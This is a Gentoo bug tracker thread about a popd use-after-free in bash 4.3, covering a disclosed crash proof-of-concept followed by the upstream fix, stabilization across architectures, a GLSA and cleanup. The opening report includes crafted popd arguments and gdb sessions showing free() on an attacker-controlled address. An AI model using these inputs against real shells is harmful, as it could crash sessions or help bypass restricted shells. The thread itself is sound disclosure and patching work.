popd can be tricked to free a user supplied address in the following way: $ popd +-111111 This could be used to bypass restricted shells (rsh) on some environments to cause use-after-free. This was already reported to bash devs and only considered a bug, if Mitre consider it could have a security impact, please assign a CVE. Details ====== $ gdb bash ... (gdb) r -c 'popd +-67372036' The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036' Program received signal SIGSEGV, Segmentation fault. 0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384 384 free (pushd_directory_list[i]); (gdb) print pushd_directory_list[i] Cannot access memory at address 0x10101010 ---- $ export AA=`perl -e 'print "A"x100000'` $ gdb ./bash ... (gdb) x/s *((char **)environ+13) 0xbffe75d4: "AA=", 'A' <repeats 197 times>... (gdb) run -c 'popd +-805281142' The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142' Program received signal SIGSEGV, Segmentation fault. internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384, flags=<optimized out>) at malloc.c:863 863 if (p->mh_alloc == ISMEMALIGN)
@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
added upstream's fix to 4.4: https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=1bf1ceeb04a2f57e1e5e1636a8c288c4d0db6682 Chet seemed confident it isn't exploitable (beyond making the active shell crash/exit immediately)
@ Arches, please test and mark stable: =app-shells/bash-4.4_p5-r1
Stabilization postponed on request of base-system (looks like they want to stabilize 4.4.x together with readline-7.x and aren't ready yet).
I've added the fix to bash-4.3 so we (base-system) have a bit more time figuring out if readline-7.0 is ready for stabilization: commit c3d3bdc215881e2712843708c42978b7bac96ba9 Author: Lars Wendler <polynomial-c@gentoo.org> Date: Sun Dec 4 17:06:54 2016 app-shells/bash: Revbump to add popd offset overflow fix to bash-4.3 (#600174). Package-Manager: portage-2.3.2 Arches please test and mark stable =app-shells/bash-4.3_p48-r1 with target KEYWORDS: alpha amd64 arm ~arm64 hppa ia64 ~m68k ~mips ppc ppc64 ~s390 ~sh sparc x86 ~amd64-fbsd ~sparc-fbsd ~x86-fbsd
Stable on alpha.
yes, we do not want to stabilize bash-4.4 this year. it needs more time to sit.
amd64 stable
x86 stable
done the rest now
(In reply to SpanKY from comment #10) > done the rest now Thanks, Mike! GLSA pending review.
This issue was resolved and addressed in GLSA 201701-02 at https://security.gentoo.org/glsa/201701-02 by GLSA coordinator Thomas Deutschmann (whissi).
Re-opening for cleanup. @ Maintainer(s): Please drop <app-shells/bash-4.3_p48-r1 or apply masks indicating a security problem.
Cleanup PR: https://github.com/gentoo/gentoo/pull/3392
Ping: PR was closed because earlier bash versions are kept for testing reasons. Security Team Padawan ChrisADR
@base-system, can we mask here?
Cleanup done, closing as RESOLVED. Thank you all.
